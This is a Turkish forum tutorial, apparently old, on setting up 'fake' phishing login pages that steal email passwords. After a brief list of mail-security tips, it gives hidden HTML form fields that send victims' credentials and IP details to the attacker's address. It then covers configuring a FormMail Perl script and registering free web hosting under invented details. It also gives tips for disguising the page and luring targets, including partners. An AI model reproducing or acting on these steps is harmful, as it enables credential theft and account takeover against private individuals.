Fake Servisi Kurmak:
İlk önce hepimizin kendi maillerimize sahip çıkması gerekir.
1. Şifreleriniz karışık olsun. Örnek olarak;türk2005hacker
2. Çoğumuzun birden fazla mail adresi bulunmakta, bu yüzden hepsine ayrı ayrı şifre verin.
3. Gizli sorunuz tahmin edilemeyecek şekilde olsun.
4. Size gelen mailler tanımadığınız kişilerden geliyorsa ve ekli bir dosya içeriyorsa sakın açmayın ve ekli dosyayı merak etmeyin
5. Sağda solda başka forumlarda gördüğünüz ve bilmediğiniz hiç bir programı denemek için bilgisayarınıza indirip çalıştırmayın.
6. Msn’de görüşürken tanımadığınız kişilerden dosya almayın, web cam davetini kabul etmeyin.
7. Antivirüs programlarınızı düzenli olarak çalıştırın ve firewall kullanın. (ben black ıce defender kullanıyorum, herhangi bir exe çalışmak istediğinde uyarıyor,bilinmeyen bir exe ise terminate ederek exe yi silebiliyorsunuz.bu crack ve serıal sitelerinde çok işe yarıyor çünkü sizden habersiz trojenler bilgisayarınıza iniyor)
yukarıdaki hususlara dikkat ettiğimiz sürece mailimize birşey olmayacaktır.
Konu 1 : Fake hazırlanışı
Fake sadece yahoo, hotmail ve mynet için değildir. Password ile girilebilen her türlü sayfa için hazırlanabilir.
Sadece giriş sayfası için değil isterseniz hakkında bilgi almak istediğiniz şahısa özel bir anket, form , aklınıza ne geliyorsa hazırlayabilirsiniz. (örnek olarak; kız veya erkek arkadaşınız hakkında bilgi edinmek istiyorsunuz , her yerde rastlayacağınız sevgi testine bunu uygulayabilirsiniz). Karşımızdaki şahısın özel bilgilerine ulaşmamız halinde mailine varsa web sayfasına bile sahip olabilirsiniz.
Buradaki önemli nokta scriptimizi çalıştıracak olan kodları düzgün bir şekilde ayarlayıp hazırladığımız sayfanın içine yerleştirmek.
Nedir bu kodlar? Ve ne işe yararlar?
Kod:
<ınput type=hidden value=ilkben02yasak name=recipient>
<ınput type=hidden value="hotmail fakemail sonucu" name=subject>
<ınput type=hidden value="hack by ilkben02" name=email>
<ınput type=hidden value="ilkben02" name=realname>
<ınput type=hidden value=http://www.balca.net/dagarcik10110.aspx name=redirect>
<ınput type="hidden" name="env_report" value="remote_host,remote_addr,remote_user,http_user_agent">
<ınput type=hidden name=print_config value="email,subject,title,recipient,config">
<ınput type=hidden value="fake sonucu" name=title>
kırmızı ile belirttiğim satır bizim scriptimizin adresini gösterir
turuncu ile belirttiğim satıra mail adresimizi yazarız
kahverengi ile belirttiğim satır bize dönen mailde yazacaklardır yukarıdaki örnekteki gibi hotmail fake sonucu, ilkben02 gibi
sarı ile belirttiğim satıra kurbanımızın login butonuna bastıktan sonra açılacak sayfanın adresini yazıyoruz.
Hangi türde fake kullanmışsak ona uygun adres yazmalıyız e-kart atmışsak örnek olarak karşısına bir e-kart açılması lazım.yeşil ile belirttiğim satır bize mail döndüğünde kurbanın ip sini kullandığı servis gibi bilgiler aktarır.
Mavi ile belirttiğim satır bize yollanacak olan mail,konu,başlık,alıcı gibi isteklerimizi bildirdiğimiz satırdır.
Fake hazırlamak için ben notepad yerine frontpage kullanmanızı tavsiye ederim çünkü önizleme kısmından fake inizin çalışıp çalışmadığını , nasıl göründüğünü , eksiklerinin olup olmadığını görebilir, ve bunları düzeltebilirsiniz.
Diyelim ki kullanan birisinin mailini ele geçirmek istiyoruz. Önce bu siteyi açıp =>dosya=>farklı kaydet diyerek bilgisayarımıza indiriyoruz. Frontpegi açıp bu sayfayı çağırıyoruz , yukarıdaki kodu kaynak kımına gelerek başlarda bir yere yerleştiriyoruz, tabi yönlendireceğimiz adres bu web sayfasına uygun bir adres olmalı.
Önizleme ile bakıyoruz ve deneme yapıyoruz , eğer sayfa yönlendirdiğimiz yere giderse bu fake hazır demektir.
Gitmez ise yerleştirdiğimiz kodumuzu oradan alıp login butonunun bulunduğu yeri bulup hemen onun altına yerleştirip yeniden deniyoruz, %80 başlara yerleştirmek yetiyor.
Fake artık kimse yemiyor diyenler, yanlış düşünüyor, çok zekice hazırlanmış fakeler her zaman işe yarar bu sizin hayal gücünüze bağlı.
Fake’i direk şahısa yollar ve mailin içinde açılmasını ve size sonuç gelmesini beklerseniz, hiç bir sonuç alamazsınız çünkü artık fakeler mail içinde açılmıyor ve uyarı veriyor.
Bu yüzden karışık bir adres ile almış olduğumuz free sitenin linkini vermemiz ve oradan bu şahısın tekrar login olmasını sağlamalıyız.
Yani hepimizin bir free site adresi sahibi olmamız lazım.
Konu 2: Kendinize free site almak ve fakeleri yerleştirmek
İlk önce adresine giriyoruz , solda free yazan kısmın en altındaki kutucuğu işaretleyip, alttaki uzun butona tıklıyoruz (new members click here to create an account)
Karşımıza yeni bir sayfa çıkıyor en altta ı agree.sıgn me up! Yazısına tıklıyoruz.karşımıza bir form çıkıyor, şimdi bunu dolduruyoruz.
Account name: kısmına (bence karmaşık olsun) açmak istediğimiz site adını giriyoruz örnek olarak benim loginpassportnet , sizde karşıdaki şahısın anlamaması için buna benzer isimlerle bir hesap açın.
Password: buraya ilkben1234 gibi hem rakam hemde harf kullanarak şifremizi yazıyoruz
your name: isim yazıyoruz (atın)
your mail: buraya mailimizi yazıyoruz ama hotmail kabul etmediği için yahoo dan alacağımız mailimizi yazıyoruz.
Ve tekrar mailimizi yazıyoruz.
Instant messagıng: bu kısıma ım servıce yahoo yapıyoruz
adress: buraya adres yazıyoruz (atın)
city: atın örnek:ankara
state: atın örnek:ankara
zip code: atın örnek:06000
country: turkey
phone number: atın örnek: 00903123332233
gender: male / female seçin
yes! ı’d like to receıve this mail kısmını işaretleyip alttaki securıty code u giriyoruz.
I agree kısmını işaretledikten sonra join now! Diyoruz
karşımıza onay sayfası geliyor.daha sonra mailimize aktivasyon başlatmak için bir mail gelecek onu aktive ettikten sonra.sitemizi fake için hazırlamaya başlayabiliriz.
İlk önce ne olduğu önemli olmasada bir index sayfası hazırlayıp upload edeceğiz. Bu sayfa olmazsa account kullanılmıyor diye kapatılabilir.
Şimdi sayfalarımızı nasıl buraya upload edeceğiz.
Direk bir sayfayı upload dediğmiz zaman kabul etmiyor bu yüzden, username ve password yazarak login oluyoruz, username sitemizin adıdır.
File manager kısmına tıklayarak , dosyalarımızı hazırlayacağımız bölüme geliyoruz.
Altta create a new file kısmından standart html seçiyoruz karşımıza çıkan yere frontpage ile hazırladığımız kodlarımızı kopyalayıp yapıştırıyoruz.
Create the file yazan yere örnek olarak uilogin.jpg yazıyoruz ve alttaki save tuşuna basıyoruz. Html değil de uzantımızın jpg olmasının sebebi reklam bannerı olmasın sayfamızda.
Daha sonra aynı adımları izleyerek bütün fakelerimiz aktarıyoruz. Dediğim gibi bir index sayfası hazırlayın ve index.html olarak kayıt edin.
Evet şu anda 250free.com adresinden kendimize free bir site açmış olduk, nasıl upload edeceğimizi de öğrendik.
Konu 3 : Perl Scriptimizi Hazırlama
Evet arkadaşlar sıra geldi scriptimizin içindeki değişiklikleri yapmaya.
Scripti açtığımızda bir takım kodlar çıkacaktır karşımıza (ben burada hepsini değil bizim için gerekli kısımları yazacağım). Ve kırmızı ile belirttiğim yerleri siz 250free.com dan kendinize açmış olduğunuz adresi yazacaksınız burada gördüğünüz benimkidir.
Kod:
##############################################################################
# define variables #
# detailed ınformation found ın readme file. #
# şmailprog defines the location of your sendmail program on your unix #
# system. #
şmailprog = ’/usr/lib/sendmail’;
# @referers allows forms to be located only on servers which are defined #
# in this field. This security fix from the last version which allowed #
# anyone on any server to use your formmail script on their web site. #
@referers = (’loginpassportnet.250free.com’);
# done #
##############################################################################
# check referring url
&check_url;
# retrieve date
&get_date;
# parse form contents
&parse_form;
# check required fields
&check_required;
# return html page or redirect user
&return_html;
# send e-mail
&send_mail;
sub check_url {
# localize the check_referer flag which determines if user is valid. #
local(şcheck_referer) = 0;
# ıf a referring url was specified, for each valid referer, make sure #
# that a valid referring url was passed to formmail. #
if (şenv{’http_referer’}) {
foreach şreferer (@referers="loginpassportnet.250free.com") {
if (şenv{’http_referer’} =~ m|https?://([^/]*)şreferer|i) {
şcheck_referer = 1;
last;
}
bu değişikliği yaptıktan sonra kaydediyoruz.scriptteki değişikliğimiz bu kadar.
Scripti indirmek için link:
Farklı kaydet diyerek indirebilirsiniz.
Konu 4: : Scriptimiz için Account Açma
netfirms.com a giriyoruz, en alttaki yazılardan free web hostıng i seçiyoruz.
Karşımıza çıkan sayfada price:ş0.00 yazısını görüyoruz ve yanındaki sıgnup now butonuna tıklıyoruz.
Şimdi açılan sayfada ı prefer a free netfırms sub domaın yazan yazıya tıklıyoruz, hiçbir uere birşey yazmıyoruz.
Karşımıza boşluk . Netfırms.com yazan bir sayfa gelecek oradaki boşluğa almak istediğimiz domaını yazıyoruz örnek olarak imha yazarsak, adındaki sub domaının sahibi oluruz.
Search butonuna bastıktan sonra, daha önce bu adres alınmamışsa ş0.000 usd yazan bir sayfa çıkar alttaki yeşil contınue butonu ile devam ediyoruz.
Evet şimdi karşımıza bir form çıktı şimdi bunu doldurup adresimizi almış olacağız.
Company name: bir şirket adı yazın gitsin
name: nickinizi yazabilirsiniz
last name: cyber yazabilirsiniz
adress: herhangi bir adres tazın
cıty: şehir yazın
satate: buraya na yazıyoruz
country: turkey seçiyoruz
zip code: 0500 uydurun birşeyler
phone: 00903331112255 gibi uydurun ama 0090 olsun
e-mail: doğru mailinizi yazın yanlış olmasın şifre gelecek
secret questıon: gizli sorunuzu yazın
terms of servıce: burayı işaretleyin
contınue butonu ile devam edin
karşımıza yine ücret 0 yazan bir sayfa gelecek tekrar contınue diyerek olayı bitiriyoruz.
Daha sonra mailinize şifre gelecektir,
Bunu ister bir ftp aracı kullanarak yada siteden login olarak daha önce hazırladığımız scriptimizi , zaten hazırda bulunan cgi-bin klasörünün içine upload edin.
Servisiniz hayırlı uğurlu olsun.
Hazırladığımız fakeleri almış olduğumuz 250free.com adresimize upload ediyoruz. Çünkü scripteki adresimiz burası